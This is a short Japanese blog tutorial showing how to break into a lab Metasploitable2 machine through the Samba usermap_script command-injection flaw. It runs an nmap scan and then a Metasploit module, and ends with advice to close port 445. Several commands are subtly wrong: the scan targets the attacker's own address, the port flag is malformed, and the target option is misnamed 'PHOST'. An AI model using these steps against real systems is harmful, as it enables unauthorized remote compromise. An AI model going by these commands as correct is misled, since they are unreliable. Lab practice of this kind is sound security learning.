attack

Metasploitによるsambaコマンドインジェクション

 

環境

Kalilinux 192.168.0.2
metasploitable2 192.168.0.3

 

ポートスキャン

 

metasplotable2のオープンポートを調べます。

 

nmap -P0-65536 192.168.0.2

 

139/tcpと445/tcpのwindowsファイル共有サービスとMicrosoftディレクトリサービス関連のポートが開いていることが確認できます。

 

sambaとはwindows以外のOSでwindowsネットワーク機能を使用可能にするソフトウェアです。

バージョン3.0.24以前には脆弱性があります。

 

 

metasplotで攻撃

 

msfconsoleを立ち上げます

 

msf > search samba

 

以下exploitを使用します。

msf > use exploit/multi/samba/usermap_script

 

ターゲットIPをセットします。

set PHOST 192.168.0.3

 

攻撃を実行します。

exploit

 

侵入できれば成功です。

 

445のポートは無意味にオープンにしておくことは避けましょう。

 

-attack

© 2021 ストロテクトNote